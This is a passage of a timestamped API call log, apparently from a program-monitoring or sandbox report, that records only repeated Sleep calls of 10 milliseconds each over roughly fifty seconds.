(dwMilliseconds=0xa) [0224.932] Sleep (dwMilliseconds=0xa) [0224.983] Sleep (dwMilliseconds=0xa) [0225.026] Sleep (dwMilliseconds=0xa) [0225.167] Sleep (dwMilliseconds=0xa) [0225.248] Sleep (dwMilliseconds=0xa) [0225.301] Sleep (dwMilliseconds=0xa) [0225.343] Sleep (dwMilliseconds=0xa) [0225.354] Sleep (dwMilliseconds=0xa) [0225.370] Sleep (dwMilliseconds=0xa) [0225.419] Sleep (dwMilliseconds=0xa) [0225.493] Sleep (dwMilliseconds=0xa) [0225.604] Sleep (dwMilliseconds=0xa) [0225.676] Sleep (dwMilliseconds=0xa) [0225.764] Sleep (dwMilliseconds=0xa) [0225.802] Sleep (dwMilliseconds=0xa) [0225.823] Sleep (dwMilliseconds=0xa) [0225.874] Sleep (dwMilliseconds=0xa) [0225.919] Sleep (dwMilliseconds=0xa) [0226.013] Sleep (dwMilliseconds=0xa) [0226.064] Sleep (dwMilliseconds=0xa) [0226.169] Sleep (dwMilliseconds=0xa) [0226.242] Sleep (dwMilliseconds=0xa) [0226.405] Sleep (dwMilliseconds=0xa) [0226.467] Sleep (dwMilliseconds=0xa) [0226.487] Sleep (dwMilliseconds=0xa) [0226.591] Sleep (dwMilliseconds=0xa) [0226.683] Sleep (dwMilliseconds=0xa) [0226.746] Sleep (dwMilliseconds=0xa) [0226.808] Sleep (dwMilliseconds=0xa) [0226.891] Sleep (dwMilliseconds=0xa) [0226.965] Sleep (dwMilliseconds=0xa) [0227.025] Sleep (dwMilliseconds=0xa) [0227.092] Sleep (dwMilliseconds=0xa) [0227.167] Sleep (dwMilliseconds=0xa) [0227.233] Sleep (dwMilliseconds=0xa) [0227.276] Sleep (dwMilliseconds=0xa) [0227.330] Sleep (dwMilliseconds=0xa) [0227.373] Sleep (dwMilliseconds=0xa) [0227.392] Sleep (dwMilliseconds=0xa) [0227.477] Sleep (dwMilliseconds=0xa) [0227.554] Sleep (dwMilliseconds=0xa) [0227.608] Sleep (dwMilliseconds=0xa) [0227.652] Sleep (dwMilliseconds=0xa) [0227.729] Sleep (dwMilliseconds=0xa) [0227.826] Sleep (dwMilliseconds=0xa) [0227.867] Sleep (dwMilliseconds=0xa) [0227.916] Sleep (dwMilliseconds=0xa) [0227.935] Sleep (dwMilliseconds=0xa) [0227.984] Sleep (dwMilliseconds=0xa) [0228.055] Sleep (dwMilliseconds=0xa) [0228.120] Sleep (dwMilliseconds=0xa) [0228.175] Sleep (dwMilliseconds=0xa) [0228.246] Sleep (dwMilliseconds=0xa) [0228.308] Sleep (dwMilliseconds=0xa) [0228.356] Sleep (dwMilliseconds=0xa) [0228.426] Sleep (dwMilliseconds=0xa) [0228.470] Sleep (dwMilliseconds=0xa) [0228.515] Sleep (dwMilliseconds=0xa) [0228.584] Sleep (dwMilliseconds=0xa) [0228.665] Sleep (dwMilliseconds=0xa) [0228.729] Sleep (dwMilliseconds=0xa) [0228.778] Sleep (dwMilliseconds=0xa) [0228.842] Sleep (dwMilliseconds=0xa) [0228.935] Sleep (dwMilliseconds=0xa) [0228.998] Sleep (dwMilliseconds=0xa) [0229.014] Sleep (dwMilliseconds=0xa) [0229.059] Sleep (dwMilliseconds=0xa) [0229.103] Sleep (dwMilliseconds=0xa) [0229.196] Sleep (dwMilliseconds=0xa) [0229.241] Sleep (dwMilliseconds=0xa) [0229.337] Sleep (dwMilliseconds=0xa) [0229.380] Sleep (dwMilliseconds=0xa) [0229.504] Sleep (dwMilliseconds=0xa) [0229.558] Sleep (dwMilliseconds=0xa) [0229.602] Sleep (dwMilliseconds=0xa) [0229.692] Sleep (dwMilliseconds=0xa) [0229.754] Sleep (dwMilliseconds=0xa) [0229.776] Sleep (dwMilliseconds=0xa) [0229.868] Sleep (dwMilliseconds=0xa) [0229.964] Sleep (dwMilliseconds=0xa) [0230.056] Sleep (dwMilliseconds=0xa) [0230.106] Sleep (dwMilliseconds=0xa) [0230.152] Sleep (dwMilliseconds=0xa) [0230.190] Sleep (dwMilliseconds=0xa) [0230.232] Sleep (dwMilliseconds=0xa) [0230.279] Sleep (dwMilliseconds=0xa) [0230.359] Sleep (dwMilliseconds=0xa) [0230.390] Sleep (dwMilliseconds=0xa) [0230.401] Sleep (dwMilliseconds=0xa) [0230.417] Sleep (dwMilliseconds=0xa) [0230.467] Sleep (dwMilliseconds=0xa) [0230.536] Sleep (dwMilliseconds=0xa) [0230.622] Sleep (dwMilliseconds=0xa) [0230.714] Sleep (dwMilliseconds=0xa) [0230.769] Sleep (dwMilliseconds=0xa) [0230.893] Sleep (dwMilliseconds=0xa) [0231.046] Sleep (dwMilliseconds=0xa) [0231.086] Sleep (dwMilliseconds=0xa) [0231.108] Sleep (dwMilliseconds=0xa) [0231.154] Sleep (dwMilliseconds=0xa) [0231.174] Sleep (dwMilliseconds=0xa) [0231.260] Sleep (dwMilliseconds=0xa) [0231.344] Sleep (dwMilliseconds=0xa) [0231.404] Sleep (dwMilliseconds=0xa) [0231.495] Sleep (dwMilliseconds=0xa) [0231.577] Sleep (dwMilliseconds=0xa) [0231.646] Sleep (dwMilliseconds=0xa) [0231.714] Sleep (dwMilliseconds=0xa) [0231.858] Sleep (dwMilliseconds=0xa) [0231.951] Sleep (dwMilliseconds=0xa) [0232.026] Sleep (dwMilliseconds=0xa) [0232.309] Sleep (dwMilliseconds=0xa) [0232.672] Sleep (dwMilliseconds=0xa) [0232.809] Sleep (dwMilliseconds=0xa) [0232.949] Sleep (dwMilliseconds=0xa) [0233.055] Sleep (dwMilliseconds=0xa) [0233.172] Sleep (dwMilliseconds=0xa) [0233.225] Sleep (dwMilliseconds=0xa) [0233.262] Sleep (dwMilliseconds=0xa) [0233.299] Sleep (dwMilliseconds=0xa) [0233.357] Sleep (dwMilliseconds=0xa) [0233.500] Sleep (dwMilliseconds=0xa) [0233.542] Sleep (dwMilliseconds=0xa) [0233.635] Sleep (dwMilliseconds=0xa) [0233.714] Sleep (dwMilliseconds=0xa) [0233.755] Sleep (dwMilliseconds=0xa) [0233.811] Sleep (dwMilliseconds=0xa) [0233.832] Sleep (dwMilliseconds=0xa) [0233.870] Sleep (dwMilliseconds=0xa) [0233.967] Sleep (dwMilliseconds=0xa) [0234.030] Sleep (dwMilliseconds=0xa) [0234.073] Sleep (dwMilliseconds=0xa) [0234.153] Sleep (dwMilliseconds=0xa) [0234.244] Sleep (dwMilliseconds=0xa) [0234.266] Sleep (dwMilliseconds=0xa) [0234.309] Sleep (dwMilliseconds=0xa) [0234.333] Sleep (dwMilliseconds=0xa) [0234.355] Sleep (dwMilliseconds=0xa) [0234.448] Sleep (dwMilliseconds=0xa) [0234.501] Sleep (dwMilliseconds=0xa) [0234.652] Sleep (dwMilliseconds=0xa) [0234.731] Sleep (dwMilliseconds=0xa) [0234.745] Sleep (dwMilliseconds=0xa) [0234.795] Sleep (dwMilliseconds=0xa) [0234.815] Sleep (dwMilliseconds=0xa) [0234.889] Sleep (dwMilliseconds=0xa) [0234.980] Sleep (dwMilliseconds=0xa) [0235.045] Sleep (dwMilliseconds=0xa) [0235.092] Sleep (dwMilliseconds=0xa) [0235.185] Sleep (dwMilliseconds=0xa) [0235.220] Sleep (dwMilliseconds=0xa) [0235.249] Sleep (dwMilliseconds=0xa) [0235.448] Sleep (dwMilliseconds=0xa) [0235.502] Sleep (dwMilliseconds=0xa) [0235.592] Sleep (dwMilliseconds=0xa) [0235.665] Sleep (dwMilliseconds=0xa) [0235.729] Sleep (dwMilliseconds=0xa) [0235.807] Sleep (dwMilliseconds=0xa) [0235.823] Sleep (dwMilliseconds=0xa) [0235.873] Sleep (dwMilliseconds=0xa) [0235.952] Sleep (dwMilliseconds=0xa) [0235.998] Sleep (dwMilliseconds=0xa) [0236.089] Sleep (dwMilliseconds=0xa) [0236.167] Sleep (dwMilliseconds=0xa) [0236.226] Sleep (dwMilliseconds=0xa) [0236.263] Sleep (dwMilliseconds=0xa) [0236.292] Sleep (dwMilliseconds=0xa) [0236.307] Sleep (dwMilliseconds=0xa) [0236.354] Sleep (dwMilliseconds=0xa) [0236.422] Sleep (dwMilliseconds=0xa) [0236.467] Sleep (dwMilliseconds=0xa) [0236.543] Sleep (dwMilliseconds=0xa) [0236.620] Sleep (dwMilliseconds=0xa) [0236.679] Sleep (dwMilliseconds=0xa) [0236.715] Sleep (dwMilliseconds=0xa) [0236.761] Sleep (dwMilliseconds=0xa) [0236.823] Sleep (dwMilliseconds=0xa) [0236.914] Sleep (dwMilliseconds=0xa) [0237.026] Sleep (dwMilliseconds=0xa) [0237.106] Sleep (dwMilliseconds=0xa) [0237.185] Sleep (dwMilliseconds=0xa) [0237.231] Sleep (dwMilliseconds=0xa) [0237.260] Sleep (dwMilliseconds=0xa) [0237.279] Sleep (dwMilliseconds=0xa) [0237.326] Sleep (dwMilliseconds=0xa) [0237.382] Sleep (dwMilliseconds=0xa) [0237.450] Sleep (dwMilliseconds=0xa) [0237.538] Sleep (dwMilliseconds=0xa) [0237.636] Sleep (dwMilliseconds=0xa) [0237.734] Sleep (dwMilliseconds=0xa) [0237.773] Sleep (dwMilliseconds=0xa) [0237.854] Sleep (dwMilliseconds=0xa) [0237.951] Sleep (dwMilliseconds=0xa) [0238.013] Sleep (dwMilliseconds=0xa) [0238.276] Sleep (dwMilliseconds=0xa) [0238.315] Sleep (dwMilliseconds=0xa) [0238.823] Sleep (dwMilliseconds=0xa) [0238.907] Sleep (dwMilliseconds=0xa) [0239.014] Sleep (dwMilliseconds=0xa) [0239.107] Sleep (dwMilliseconds=0xa) [0239.199] Sleep (dwMilliseconds=0xa) [0239.292] Sleep (dwMilliseconds=0xa) [0239.499] Sleep (dwMilliseconds=0xa) [0239.544] Sleep (dwMilliseconds=0xa) [0239.563] Sleep (dwMilliseconds=0xa) [0239.657] Sleep (dwMilliseconds=0xa) [0239.825] Sleep (dwMilliseconds=0xa) [0239.919] Sleep (dwMilliseconds=0xa) [0240.011] Sleep (dwMilliseconds=0xa) [0240.038] Sleep (dwMilliseconds=0xa) [0240.107] Sleep (dwMilliseconds=0xa) [0240.141] Sleep (dwMilliseconds=0xa) [0240.201] Sleep (dwMilliseconds=0xa) [0240.295] Sleep (dwMilliseconds=0xa) [0240.374] Sleep (dwMilliseconds=0xa) [0240.421] Sleep (dwMilliseconds=0xa) [0240.480] Sleep (dwMilliseconds=0xa) [0240.561] Sleep (dwMilliseconds=0xa) [0240.592] Sleep (dwMilliseconds=0xa) [0240.606] Sleep (dwMilliseconds=0xa) [0240.620] Sleep (dwMilliseconds=0xa) [0240.671] Sleep (dwMilliseconds=0xa) [0240.734] Sleep (dwMilliseconds=0xa) [0240.777] Sleep (dwMilliseconds=0xa) [0240.886] Sleep (dwMilliseconds=0xa) [0240.983] Sleep (dwMilliseconds=0xa) [0241.072] Sleep (dwMilliseconds=0xa) [0241.113] Sleep (dwMilliseconds=0xa) [0241.136] Sleep (dwMilliseconds=0xa) [0241.185] Sleep (dwMilliseconds=0xa) [0241.255] Sleep (dwMilliseconds=0xa) [0241.433] Sleep (dwMilliseconds=0xa) [0241.573] Sleep (dwMilliseconds=0xa) [0241.669] Sleep (dwMilliseconds=0xa) [0241.714] Sleep (dwMilliseconds=0xa) [0241.816] Sleep (dwMilliseconds=0xa) [0241.948] Sleep (dwMilliseconds=0xa) [0242.124] Sleep (dwMilliseconds=0xa) [0242.261] Sleep (dwMilliseconds=0xa) [0242.380] Sleep (dwMilliseconds=0xa) [0242.471] Sleep (dwMilliseconds=0xa) [0242.504] Sleep (dwMilliseconds=0xa) [0242.530] Sleep (dwMilliseconds=0xa) [0242.576] Sleep (dwMilliseconds=0xa) [0242.671] Sleep (dwMilliseconds=0xa) [0242.717] Sleep (dwMilliseconds=0xa) [0242.760] Sleep (dwMilliseconds=0xa) [0242.858] Sleep (dwMilliseconds=0xa) [0242.952] Sleep (dwMilliseconds=0xa) [0242.998] Sleep (dwMilliseconds=0xa) [0243.044] Sleep (dwMilliseconds=0xa) [0243.080] Sleep (dwMilliseconds=0xa) [0243.155] Sleep (dwMilliseconds=0xa) [0243.277] Sleep (dwMilliseconds=0xa) [0243.354] Sleep (dwMilliseconds=0xa) [0243.432] Sleep (dwMilliseconds=0xa) [0243.529] Sleep (dwMilliseconds=0xa) [0243.552] Sleep (dwMilliseconds=0xa) [0243.632] Sleep (dwMilliseconds=0xa) [0243.842] Sleep (dwMilliseconds=0xa) [0243.915] Sleep (dwMilliseconds=0xa) [0244.019] Sleep (dwMilliseconds=0xa) [0244.217] Sleep (dwMilliseconds=0xa) [0244.272] Sleep (dwMilliseconds=0xa) [0244.408] Sleep (dwMilliseconds=0xa) [0244.511] Sleep (dwMilliseconds=0xa) [0244.604] Sleep (dwMilliseconds=0xa) [0244.702] Sleep (dwMilliseconds=0xa) [0244.792] Sleep (dwMilliseconds=0xa) [0244.845] Sleep (dwMilliseconds=0xa) [0244.872] Sleep (dwMilliseconds=0xa) [0244.919] Sleep (dwMilliseconds=0xa) [0244.933] Sleep (dwMilliseconds=0xa) [0244.983] Sleep (dwMilliseconds=0xa) [0245.068] Sleep (dwMilliseconds=0xa) [0245.140] Sleep (dwMilliseconds=0xa) [0245.232] Sleep (dwMilliseconds=0xa) [0245.375] Sleep (dwMilliseconds=0xa) [0245.391] Sleep (dwMilliseconds=0xa) [0245.417] Sleep (dwMilliseconds=0xa) [0245.511] Sleep (dwMilliseconds=0xa) [0245.561] Sleep (dwMilliseconds=0xa) [0245.607] Sleep (dwMilliseconds=0xa) [0245.700] Sleep (dwMilliseconds=0xa) [0245.776] Sleep (dwMilliseconds=0xa) [0245.796] Sleep (dwMilliseconds=0xa) [0245.854] Sleep (dwMilliseconds=0xa) [0245.870] Sleep (dwMilliseconds=0xa) [0245.903] Sleep (dwMilliseconds=0xa) [0245.980] Sleep (dwMilliseconds=0xa) [0246.029] Sleep (dwMilliseconds=0xa) [0246.122] Sleep (dwMilliseconds=0xa) [0246.201] Sleep (dwMilliseconds=0xa) [0246.228] Sleep (dwMilliseconds=0xa) [0246.279] Sleep (dwMilliseconds=0xa) [0246.306] Sleep (dwMilliseconds=0xa) [0246.327] Sleep (dwMilliseconds=0xa) [0246.373] Sleep (dwMilliseconds=0xa) [0246.498] Sleep (dwMilliseconds=0xa) [0246.545] Sleep (dwMilliseconds=0xa) [0246.593] Sleep (dwMilliseconds=0xa) [0246.631] Sleep (dwMilliseconds=0xa) [0246.728] Sleep (dwMilliseconds=0xa) [0246.787] Sleep (dwMilliseconds=0xa) [0246.850] Sleep (dwMilliseconds=0xa) [0246.904] Sleep (dwMilliseconds=0xa) [0246.941] Sleep (dwMilliseconds=0xa) [0247.030] Sleep (dwMilliseconds=0xa) [0247.118] Sleep (dwMilliseconds=0xa) [0247.201] Sleep (dwMilliseconds=0xa) [0247.370] Sleep (dwMilliseconds=0xa) [0247.456] Sleep (dwMilliseconds=0xa) [0247.564] Sleep (dwMilliseconds=0xa) [0247.690] Sleep (dwMilliseconds=0xa) [0247.766] Sleep (dwMilliseconds=0xa) [0247.852] Sleep (dwMilliseconds=0xa) [0247.967] Sleep (dwMilliseconds=0xa) [0248.049] Sleep (dwMilliseconds=0xa) [0248.103] Sleep (dwMilliseconds=0xa) [0248.165] Sleep (dwMilliseconds=0xa) [0248.220] Sleep (dwMilliseconds=0xa) [0248.261] Sleep (dwMilliseconds=0xa) [0248.308] Sleep (dwMilliseconds=0xa) [0248.417] Sleep (dwMilliseconds=0xa) [0248.684] Sleep (dwMilliseconds=0xa) [0248.766] Sleep (dwMilliseconds=0xa) [0248.890] Sleep (dwMilliseconds=0xa) [0248.932] Sleep (dwMilliseconds=0xa) [0248.997] Sleep (dwMilliseconds=0xa) [0249.030] Sleep (dwMilliseconds=0xa) [0249.042] Sleep (dwMilliseconds=0xa) [0249.058] Sleep (dwMilliseconds=0xa) [0249.151] Sleep (dwMilliseconds=0xa) [0249.226] Sleep (dwMilliseconds=0xa) [0249.294] Sleep (dwMilliseconds=0xa) [0249.386] Sleep (dwMilliseconds=0xa) [0249.424] Sleep (dwMilliseconds=0xa) [0249.514] Sleep (dwMilliseconds=0xa) [0249.668] Sleep (dwMilliseconds=0xa) [0249.794] Sleep (dwMilliseconds=0xa) [0249.948] Sleep (dwMilliseconds=0xa) [0250.121] Sleep (dwMilliseconds=0xa) [0250.198] Sleep (dwMilliseconds=0xa) [0250.236] Sleep (dwMilliseconds=0xa) [0250.264] Sleep (dwMilliseconds=0xa) [0250.375] Sleep (dwMilliseconds=0xa) [0250.432] Sleep (dwMilliseconds=0xa) [0250.529] Sleep (dwMilliseconds=0xa) [0250.628] Sleep (dwMilliseconds=0xa) [0250.716] Sleep (dwMilliseconds=0xa) [0250.752] Sleep (dwMilliseconds=0xa) [0250.826] Sleep (dwMilliseconds=0xa) [0250.920] Sleep (dwMilliseconds=0xa) [0250.998] Sleep (dwMilliseconds=0xa) [0251.123] Sleep (dwMilliseconds=0xa) [0251.195] Sleep (dwMilliseconds=0xa) [0251.296] Sleep (dwMilliseconds=0xa) [0251.386] Sleep (dwMilliseconds=0xa) [0251.460] Sleep (dwMilliseconds=0xa) [0251.528] Sleep (dwMilliseconds=0xa) [0251.620] Sleep (dwMilliseconds=0xa) [0251.679] Sleep (dwMilliseconds=0xa) [0251.715] Sleep (dwMilliseconds=0xa) [0251.756] Sleep (dwMilliseconds=0xa) [0251.958] Sleep (dwMilliseconds=0xa) [0252.066] Sleep (dwMilliseconds=0xa) [0252.232] Sleep (dwMilliseconds=0xa) [0252.342] Sleep (dwMilliseconds=0xa) [0252.424] Sleep (dwMilliseconds=0xa) [0252.532] Sleep (dwMilliseconds=0xa) [0252.604] Sleep (dwMilliseconds=0xa) [0252.651] Sleep (dwMilliseconds=0xa) [0252.702] Sleep (dwMilliseconds=0xa) [0252.737] Sleep (dwMilliseconds=0xa) [0252.842] Sleep (dwMilliseconds=0xa) [0252.923] Sleep (dwMilliseconds=0xa) [0253.011] Sleep (dwMilliseconds=0xa) [0253.092] Sleep (dwMilliseconds=0xa) [0253.143] Sleep (dwMilliseconds=0xa) [0253.203] Sleep (dwMilliseconds=0xa) [0253.248] Sleep (dwMilliseconds=0xa) [0253.315] Sleep (dwMilliseconds=0xa) [0253.406] Sleep (dwMilliseconds=0xa) [0253.495] Sleep (dwMilliseconds=0xa) [0253.548] Sleep (dwMilliseconds=0xa) [0253.639] Sleep (dwMilliseconds=0xa) [0253.705] Sleep (dwMilliseconds=0xa) [0253.749] Sleep (dwMilliseconds=0xa) [0253.782] Sleep (dwMilliseconds=0xa) [0253.874] Sleep (dwMilliseconds=0xa) [0253.966] Sleep (dwMilliseconds=0xa) [0254.027] Sleep (dwMilliseconds=0xa) [0254.107] Sleep (dwMilliseconds=0xa) [0254.200] Sleep (dwMilliseconds=0xa) [0254.261] Sleep (dwMilliseconds=0xa) [0254.295] Sleep (dwMilliseconds=0xa) [0254.307] Sleep (dwMilliseconds=0xa) [0254.325] Sleep (dwMilliseconds=0xa) [0254.450] Sleep (dwMilliseconds=0xa) [0254.533] Sleep (dwMilliseconds=0xa) [0254.620] Sleep (dwMilliseconds=0xa) [0254.716] Sleep (dwMilliseconds=0xa) [0254.824] Sleep (dwMilliseconds=0xa) [0254.839] Sleep (dwMilliseconds=0xa) [0254.888] Sleep (dwMilliseconds=0xa) [0254.927] Sleep (dwMilliseconds=0xa) [0254.950] Sleep (dwMilliseconds=0xa) [0255.045] Sleep (dwMilliseconds=0xa) [0255.136] Sleep (dwMilliseconds=0xa) [0255.230] Sleep (dwMilliseconds=0xa) [0255.327] Sleep (dwMilliseconds=0xa) [0255.403] Sleep (dwMilliseconds=0xa) [0255.534] Sleep (dwMilliseconds=0xa) [0255.668] Sleep (dwMilliseconds=0xa) [0255.756] Sleep (dwMilliseconds=0xa) [0255.871] Sleep (dwMilliseconds=0xa) [0256.019] Sleep (dwMilliseconds=0xa) [0256.105] Sleep (dwMilliseconds=0xa) [0256.129] Sleep (dwMilliseconds=0xa) [0256.169] Sleep (dwMilliseconds=0xa) [0256.200] Sleep (dwMilliseconds=0xa) [0256.214] Sleep (dwMilliseconds=0xa) [0256.276] Sleep (dwMilliseconds=0xa) [0256.376] Sleep (dwMilliseconds=0xa) [0256.468] Sleep (dwMilliseconds=0xa) [0256.561] Sleep (dwMilliseconds=0xa) [0256.626] Sleep (dwMilliseconds=0xa) [0256.662] Sleep (dwMilliseconds=0xa) [0256.718] Sleep (dwMilliseconds=0xa) [0256.783] Sleep (dwMilliseconds=0xa) [0256.965] Sleep (dwMilliseconds=0xa) [0257.133] Sleep (dwMilliseconds=0xa) [0257.370] Sleep (dwMilliseconds=0xa) [0257.517] Sleep (dwMilliseconds=0xa) [0257.700] Sleep (dwMilliseconds=0xa) [0257.876] Sleep (dwMilliseconds=0xa) [0257.979] Sleep (dwMilliseconds=0xa) [0258.152] Sleep (dwMilliseconds=0xa) [0258.254] Sleep (dwMilliseconds=0xa) [0258.307] Sleep (dwMilliseconds=0xa) [0258.374] Sleep (dwMilliseconds=0xa) [0258.488] Sleep (dwMilliseconds=0xa) [0258.604] Sleep (dwMilliseconds=0xa) [0258.747] Sleep (dwMilliseconds=0xa) [0258.822] Sleep (dwMilliseconds=0xa) [0258.886] Sleep (dwMilliseconds=0xa) [0258.967] Sleep (dwMilliseconds=0xa) [0259.025] Sleep (dwMilliseconds=0xa) [0259.123] Sleep (dwMilliseconds=0xa) [0259.214] Sleep (dwMilliseconds=0xa) [0259.268] Sleep (dwMilliseconds=0xa) [0259.339] Sleep (dwMilliseconds=0xa) [0259.378] Sleep (dwMilliseconds=0xa) [0259.437] Sleep (dwMilliseconds=0xa) [0259.468] Sleep (dwMilliseconds=0xa) [0259.514] Sleep (dwMilliseconds=0xa) [0259.620] Sleep (dwMilliseconds=0xa) [0259.715] Sleep (dwMilliseconds=0xa) [0259.813] Sleep (dwMilliseconds=0xa) [0259.886] Sleep (dwMilliseconds=0xa) [0259.960] Sleep (dwMilliseconds=0xa) [0260.000] Sleep (dwMilliseconds=0xa) [0260.010] Sleep (dwMilliseconds=0xa) [0260.030] Sleep (dwMilliseconds=0xa) [0260.073] Sleep (dwMilliseconds=0xa) [0260.153] Sleep (dwMilliseconds=0xa) [0260.248] Sleep (dwMilliseconds=0xa) [0260.357] Sleep (dwMilliseconds=0xa) [0260.428] Sleep (dwMilliseconds=0xa) [0260.495] Sleep (dwMilliseconds=0xa) [0260.589] Sleep (dwMilliseconds=0xa) [0260.635] Sleep (dwMilliseconds=0xa) [0260.782] Sleep (dwMilliseconds=0xa) [0260.891] Sleep (dwMilliseconds=0xa) [0260.984] Sleep (dwMilliseconds=0xa) [0261.074] Sleep (dwMilliseconds=0xa) [0261.165] Sleep (dwMilliseconds=0xa) [0261.208] Sleep (dwMilliseconds=0xa) [0261.263] Sleep (dwMilliseconds=0xa) [0261.308] Sleep (dwMilliseconds=0xa) [0261.355] Sleep (dwMilliseconds=0xa) [0261.462] Sleep (dwMilliseconds=0xa) [0261.617] Sleep (dwMilliseconds=0xa) [0261.763] Sleep (dwMilliseconds=0xa) [0261.890] Sleep (dwMilliseconds=0xa) [0261.951] Sleep (dwMilliseconds=0xa) [0262.029] Sleep (dwMilliseconds=0xa) [0262.089] Sleep (dwMilliseconds=0xa) [0262.214] Sleep (dwMilliseconds=0xa) [0262.387] Sleep (dwMilliseconds=0xa) [0262.480] Sleep (dwMilliseconds=0xa) [0262.568] Sleep (dwMilliseconds=0xa) [0262.733] Sleep (dwMilliseconds=0xa) [0262.923] Sleep (dwMilliseconds=0xa) [0263.198] Sleep (dwMilliseconds=0xa) [0263.320] Sleep (dwMilliseconds=0xa) [0263.434] Sleep (dwMilliseconds=0xa) [0263.521] Sleep (dwMilliseconds=0xa) [0263.777] Sleep (dwMilliseconds=0xa) [0264.011] Sleep (dwMilliseconds=0xa) [0264.153] Sleep (dwMilliseconds=0xa) [0264.245] Sleep (dwMilliseconds=0xa) [0264.354] Sleep (dwMilliseconds=0xa) [0264.419] Sleep (dwMilliseconds=0xa) [0264.461] Sleep (dwMilliseconds=0xa) [0264.514] Sleep (dwMilliseconds=0xa) [0264.548] Sleep (dwMilliseconds=0xa) [0264.605] Sleep (dwMilliseconds=0xa) [0264.714] Sleep (dwMilliseconds=0xa) [0264.797] Sleep (dwMilliseconds=0xa) [0264.859] Sleep (dwMilliseconds=0xa) [0264.951] Sleep (dwMilliseconds=0xa) [0265.034] Sleep (dwMilliseconds=0xa) [0265.089] Sleep (dwMilliseconds=0xa) [0265.140] Sleep (dwMilliseconds=0xa) [0265.219] Sleep (dwMilliseconds=0xa) [0265.295] Sleep (dwMilliseconds=0xa) [0265.389] Sleep (dwMilliseconds=0xa) [0265.529] Sleep (dwMilliseconds=0xa) [0265.589] Sleep (dwMilliseconds=0xa) [0265.656] Sleep (dwMilliseconds=0xa) [0265.701] Sleep (dwMilliseconds=0xa) [0265.716] Sleep (dwMilliseconds=0xa) [0265.767] Sleep (dwMilliseconds=0xa) [0265.856] Sleep (dwMilliseconds=0xa) [0265.929] Sleep (dwMilliseconds=0xa) [0266.081] Sleep (dwMilliseconds=0xa) [0266.156] Sleep (dwMilliseconds=0xa) [0266.230] Sleep (dwMilliseconds=0xa) [0266.293] Sleep (dwMilliseconds=0xa) [0266.318] Sleep (dwMilliseconds=0xa) [0266.346] Sleep (dwMilliseconds=0xa) [0266.419] Sleep (dwMilliseconds=0xa) [0266.480] Sleep (dwMilliseconds=0xa) [0266.542] Sleep (dwMilliseconds=0xa) [0266.635] Sleep (dwMilliseconds=0xa) [0266.745] Sleep (dwMilliseconds=0xa) [0266.791] Sleep (dwMilliseconds=0xa) [0266.855] Sleep (dwMilliseconds=0xa) [0266.940] Sleep (dwMilliseconds=0xa) [0266.995] Sleep (dwMilliseconds=0xa) [0267.091] Sleep (dwMilliseconds=0xa) [0267.176] Sleep (dwMilliseconds=0xa) [0267.310] Sleep (dwMilliseconds=0xa) [0267.402] Sleep (dwMilliseconds=0xa) [0267.464] Sleep (dwMilliseconds=0xa) [0267.573] Sleep (dwMilliseconds=0xa) [0267.652] Sleep (dwMilliseconds=0xa) [0267.764] Sleep (dwMilliseconds=0xa) [0267.821] Sleep (dwMilliseconds=0xa) [0267.964] Sleep (dwMilliseconds=0xa) [0268.009] Sleep (dwMilliseconds=0xa) [0268.076] Sleep (dwMilliseconds=0xa) [0268.099] Sleep (dwMilliseconds=0xa) [0268.154] Sleep (dwMilliseconds=0xa) [0268.220] Sleep (dwMilliseconds=0xa) [0268.285] Sleep (dwMilliseconds=0xa) [0268.337] Sleep (dwMilliseconds=0xa) [0268.448] Sleep (dwMilliseconds=0xa) [0268.504] Sleep (dwMilliseconds=0xa) [0268.587] Sleep (dwMilliseconds=0xa) [0268.629] Sleep (dwMilliseconds=0xa) [0268.657] Sleep (dwMilliseconds=0xa) [0268.752] Sleep (dwMilliseconds=0xa) [0268.905] Sleep (dwMilliseconds=0xa) [0269.078] Sleep (dwMilliseconds=0xa) [0269.103] Sleep (dwMilliseconds=0xa) [0269.162] Sleep (dwMilliseconds=0xa) [0269.245] Sleep (dwMilliseconds=0xa) [0269.429] Sleep (dwMilliseconds=0xa) [0269.667] Sleep (dwMilliseconds=0xa) [0269.875] Sleep (dwMilliseconds=0xa) [0270.033] Sleep (dwMilliseconds=0xa) [0270.140] Sleep (dwMilliseconds=0xa) [0270.279] Sleep (dwMilliseconds=0xa) [0270.416] Sleep (dwMilliseconds=0xa) [0270.484] Sleep (dwMilliseconds=0xa) [0270.511] Sleep (dwMilliseconds=0xa) [0270.607] Sleep (dwMilliseconds=0xa) [0270.697] Sleep (dwMilliseconds=0xa) [0270.788] Sleep (dwMilliseconds=0xa) [0270.876] Sleep (dwMilliseconds=0xa) [0270.982] Sleep (dwMilliseconds=0xa) [0271.092] Sleep (dwMilliseconds=0xa) [0271.115] Sleep (dwMilliseconds=0xa) [0271.201] Sleep (dwMilliseconds=0xa) [0271.295] Sleep (dwMilliseconds=0xa) [0271.388] Sleep (dwMilliseconds=0xa) [0271.449] Sleep (dwMilliseconds=0xa) [0271.541] Sleep (dwMilliseconds=0xa) [0271.640] Sleep (dwMilliseconds=0xa) [0271.655] Sleep (dwMilliseconds=0xa) [0271.703] Sleep (dwMilliseconds=0xa) [0271.749] Sleep (dwMilliseconds=0xa) [0271.761] Sleep (dwMilliseconds=0xa) [0271.880] Sleep (dwMilliseconds=0xa) [0271.983] Sleep (dwMilliseconds=0xa) [0272.026] Sleep (dwMilliseconds=0xa) [0272.124] Sleep (dwMilliseconds=0xa) [0272.432] Sleep (dwMilliseconds=0xa) [0272.667] Sleep (dwMilliseconds=0xa) [0272.823] Sleep (dwMilliseconds=0xa) [0272.980] Sleep (dwMilliseconds=0xa) [0273.145] Sleep (dwMilliseconds=0xa) [0273.261] Sleep (dwMilliseconds=0xa) [0273.340] Sleep (dwMilliseconds=0xa) [0273.389] Sleep (dwMilliseconds=0xa) [0273.423] Sleep (dwMilliseconds=0xa) [0273.495] Sleep (dwMilliseconds=0xa) [0273.589] Sleep (dwMilliseconds=0xa) [0273.696] Sleep (dwMilliseconds=0xa) [0273.794] Sleep (dwMilliseconds=0xa) [0273.974] Sleep (dwMilliseconds=0xa) [0274.031] Sleep (dwMilliseconds=0xa) [0274.122] Sleep (dwMilliseconds=0xa) [0274.181] Sleep (dwMilliseconds=0xa) [0274.279] Sleep (dwMilliseconds=0xa) [0274.370] Sleep (dwMilliseconds=0xa) [0274.430] Sleep (dwMilliseconds=0xa) [0274.529] Sleep (dwMilliseconds=0xa) [0274.588] Sleep (dwMilliseconds=0xa) [0274.609] Sleep (dwMilliseconds=0xa) [0274.666] Sleep (dwMilliseconds=0xa) [0274.743] Sleep (dwMilliseconds=0xa) [0274.810] 